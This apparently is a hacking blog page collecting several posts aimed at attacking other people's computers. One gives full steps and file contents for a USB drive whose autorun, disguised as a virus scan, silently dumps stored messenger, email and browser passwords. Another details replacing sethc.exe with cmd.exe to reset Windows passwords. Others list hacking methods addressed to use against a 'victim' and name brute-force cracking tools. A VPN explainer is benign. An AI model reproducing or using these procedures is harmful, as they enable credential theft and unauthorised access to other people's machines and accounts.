Showing posts with label BEST HACKING. Show all posts
Showing posts with label BEST HACKING. Show all posts

How to Hack Passwords Using a USB Drive



As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and a USB pendrive, you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit:
MessenPassRecovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassViewRecovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE PassviewIE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassViewRecovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
PasswordFoxPasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed:
Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step by step procedre to create the password hacking toolkit;
You must temporarily disable your antivirus before following these steps.
  1. Download all the 5 tools, extract them and copy only the executable files (.exe files) onto your USB Pendrive.
    ie: Copy the files – mspass.exemailpv.exeiepv.exepspv.exe andpasswordfox.exe into your USB Drive.
  2. Create a new Notepad and write the following text into it:
    [autorun] open=launch.bat
    ACTION= Perform a Virus Scan
    save the Notepad and rename it from New Text Document.txt toautorun.inf. Now copy the autorun.inf file onto your USB pendrive.
  3. Create another Notepad and write the following text onto it:
    start mspass.exe /stext mspass.txt
    start mailpv.exe /stext mailpv.txt
    start iepv.exe /stext iepv.txt
    start pspv.exe /stext pspv.txt
    start passwordfox.exe /stext passwordfox.txt

    Save the Notepad and rename it from New Text Document.txt tolaunch.batCopy the launch.bat file to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps:
    1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
    2. In the pop-up window, select the first option (Perform a Virus Scan).
    3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
    4. Remove the pendrive and you’ll see the stored passwords in the .TXTfiles.
This hack works on Windows 2000, XP Vista and 7.
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

All Types Of Hacking Techniques ~ Defence Hacker



Common Methods for Hacking Computer Terminals(Servers):

This comprises of either taking control over terminal(or Server) or render it useless or to crash it.. following methods are used from a long time and are still used..

1. Denial of Service - 
DoS attacks give hackers a way to bring down a network without gaining internal access. DoS attacks work by flooding the access routers with bogus traffic(which can be e-mail or Transmission Control Protocol, TCP, packets).

2. Distributed DoSs -
Distributed DoSs (DDoSs) are coordinated DoS attacks from multiple sources. A DDoS is more difficult to block because it uses multiple, changing, source IP addresses.

3. Sniffing - 
Sniffing refers to the act of intercepting TCP packets. This interception can happen through simple eavesdropping or something more sinister.

4. Spoofing - 
Spoofing is the act of sending an illegitimate packet with an expected acknowledgment (ACK), which a hacker can guess, predict, or obtain by snooping

5. SQL injection -
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. It uses normal SQL commands to get into database with elivated privellages..

6. Viruses and Worms - 
Viruses and worms are self-replicating programs or code fragments that attach themselves to other programs (viruses) or machines (worms). Both viruses and worms attempt to shut down networks by flooding them with massive amounts of bogus traffic, usually through e-mail.

7. Back Doors - 
Hackers can gain access to a network by exploiting back doors administrative shortcuts, configuration errors, easily deciphered passwords, and unsecured dial-ups. With the aid of computerized searchers (bots), hackers can probably find any weakness in the network.

So, not interested in these stuffs.. huh??? wait there is more for you.. So, how about the one related to hacking the passwords of email and doing some more exciting stuffs.. The various methods employed for this are:

8. Trojan Horses -
Trojan horses, which are attached to other programs, are the leading cause of all break-ins. When a user downloads and activates a Trojan horse, the software can take the full control over the system and you can remotely control the whole system.. great..!!! They are also reffered as RATs(Remote Administration tools)

9. Keyloggers -
Consider the situation, everything you type in the system is mailed to the hacker..!! Wouldn't it be easy to track your password from that.. Keyloggers perform similar functionallities.. So next time you type anything.. Beware..!! Have already posted about keyloggers and ways to protect yourself from them..

10. BruteForcing - 
The longest and most tiring job.. don't even consider this if you don't know the SET of password for your victim..

11. Secret Question - 
According to a survey done by security companies, it is found that rather than helping the legitimate users the security questions are more useful to the hackers.. So if you know the victim well try this..

12. Social Engineering - 
Ya this was one of the oldest trick to hack.. Try to convince your user that you are a legitimate person from the system and needs your password for the continuation of the service or some maintainence.. This won't work now since most of the users are now aware about the Scam.. But this Social Engginering concept is must for you to have to convince victim for many reasons..!!!

13. Phishing - 
This is another type of keylogging, here you have to bring the user to a webpage created by you resembling the legitimate one and get him to enter his password, to get the same in your mail box..!! Use social engginering..

14. Fake Messengers - 
So its a form of phishing in the application format.. getting user, to enter the login info in the software and check your maill..!!!

15. Cookie Stealer - 
Here the cookie saved by the sites are taken and decoded and if you get lucky.. You have the password..!!!

Hmmm.. not satisfied with single account at a time..?? so there are ways to hack lots of accounts together.. I know few but there exists many..!! listed are the ones i know and will teach you in coming posts...

16. DNS Poisoning or PHARMING - 
So, phisihing is a tough job.. isn't it..?? convincing someone to enter their password at your page..?? what if you don't have to convince..?? what if they are directed automatically to your site without having a clue..?? Nice huh..?? Pharming does the same for you.. More about it in my next post..

17. Whaling - 
This method gets you the password of the accounts which are used by the hackers to recive the passwords.. So you just have to hack one ID, which is simplest method( Easy then hacking any other account, will tell you how in coming posts..) and you will have loads of passwords and so loads of accounts at your mercy..!!!


Dont Forgot to leave a comment if you like the post  


Live Chat is Available on DefenceHacker.in


We have launched a chat on our website for Readers. The Live Chat is available For 365 days online. To start a conversation with our Readers support, 

Simply go to   and click on button Online on the right side of the page. We will do  best to help you as soon as possible.
Thank You.

Yours Hacker Friend,
Parth Patel
(Defence Hacker)

What Is VPN ? Top VPN Services



  • VPN ( Virtual Private Network ) using for security in internet networks. It will provide long distance connectivity, between multiple offices of a company by providing secure data transfer and encryption.It can provide security in your video conferencing, as well as data transfer. It reduces the costs for establishment and maintaining long distance networks. Totally VPN service containing more advantages than normal networks.

  • A virtual private network ( VPN )is a special type of wide area network (WAN), which establish connectivity without using leased private lines and makes use of the Internet. It uses the established Internet network, for remote connectivity between long distance offices, workstations or networks. VPN has its own set of softwares, protocols and security constructs which make secure connectivity possible.  


How VPN Work ?


  • Normally user double clicks on a software shortcut and the VPN connection window appears. Then user enters a username and password and press connect, the VPN connection is immediately established. Once users are connected to the office network over VPN, they can access files and other resources. After their work press ” Disconnect ” button for disconnect PC from VPN network.
  • In order to use VPN, your Internet connection should have a static IP address. For establishing of a VPN connection, a secure tunnel is established between VPN server and client. A VPN tunnel is known as a special type of link between a VPN server and a client. The datas transported through the VPN network follows different protocol rules that encrypt the datas over its journey to the VPN server. In the time of reception at the VPN server, the data is again decrypted. Tunnel is a dedicated and secure connection maintained between the VPN server and remote computer. A VPN tunnel may be voluntary or compulsory. Protocols used for VPN tunneling are Layer Two Tunneling Protocol (L2TP), Point-to-Point Tunneling Protocol (PPTP) and Internet Protocol Security (Ipsec).



Advantages of VPN

  • VPN network providing secure data transfer and encryption.
  • It reduces the costs involved in maintaining long distance networks.
  • VPN is useful for remote access.
  • VPN allow Access to Mobile Users.
  • Several ports for VPN connection (ports: 1194, 53, 5190)

VPN Service Providers



Dont Forgot to leave a comment if you like the post  





Brute Force ~ Password Cracking


Hello Friends,
    Today i am posting an article on "Brute Force".As In many situation we need to brute force to crack any password protracted panel...:)

What Is Brute-forcing?

Brute force (also known as brute force cracking) is a trial and error method used by application programs to decode encrypted data such as passwords or Data Encryption Standard (DES) keys.Just as a hacker might break into, or "crack" a safe by trying many possible combinations, a brute force cracking application proceeds through all possible combinations of legal characters in sequence. Brute force is considered to be an infallible, although time-consuming, approach.

Crackers are sometimes used in an organization to test network security.

Example: 0phtcrack uses brute force to crack Windows NT passwords from a workstation. PC Magazine reported that a system administrator who used the program from a Windows 95 terminal with no administrative privileges, was able to uncover 85 percent of office passwords within twenty minutes.

You must have seen in movies how a hacker cracks a password. He take out a small device from his pocket. Connect it to the locker or whatever he wants to crack and then lots of digits and alphabets are shuffled on the device’s screen and in a matter of minutes (and sometimes in seconds), the thing is unlocked. Pretty Impressive but it doesn’t happen that way. Basically a online system (by online system i means a system which requires you to log in to get access) can’t be hacked like that. Even a password stored in a offline file can’t be hacked so easily.

You want to access a file which is password protected. You create a program that tries every possible combination of alphabets and numbers and then feed it to the file if its the right one. This procedure is repeated till the right combination is accepted by the file. This is what we call as a attack. And this very procedure of trying possible combinations is called Brute Force Attack.

Now even if a hacker has the best of hardware, he can’t hack that easily. Why? Ever entered a password wrong multiple times? It requires you to enter the image to confirm that you are a human and it is not a account and even if that fails (yes there are algorithms that can read the text behind the image), the user is forbidden to enter the password for a fixed amount of time. So, there is no way in hell that a hacker can hack by Brute force or even with the help of rainbow tables. But it surely gets the job done for offline files...

Here is the list of most popular brute forcing softwares:-

1.Attack tool kit
2.CrackWhore 2.0
3.Apache scanner
4.Brutus
5.Brutus 2006
6.CGI scan
7.crackftp
8.E-mail cracker
9.hackers utillity
10.php brutforcer
11.php BB pass extracter
12.php cracker
13.shadow scan
14.web crack 4.0
and many others...

You can googel it and download them easily...for free 

Dont Forgot to leave a comment if you like the post 

Hack Windows 7 Password the Easy Way ~ Best Hacking




Boot off the Windows disk and select the “Repair your computer” option from the lower left-hand corner.

Follow through until you get to the option to open the Command Prompt, which you’ll want to select.

First you’ll want to type in the following command to backup the original sticky keys file:
copy c:\windows\system32\sethc.exe c:\
Then you’ll copy the command prompt executable (cmd.exe) over top of the sticky keys executable:
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

Now you can reboot the PC.

Resetting the Password

Once you get to the login screen, hit the Shift key 5 times, and you’ll see an administrator mode command prompt.



Now to reset the password—just type the following command, replacing the username and password with the combination you want:
net user yourusername MyNewPassword

That’s all there is to it. Now you can login.



Dont Forgot to leave a comment if you like the post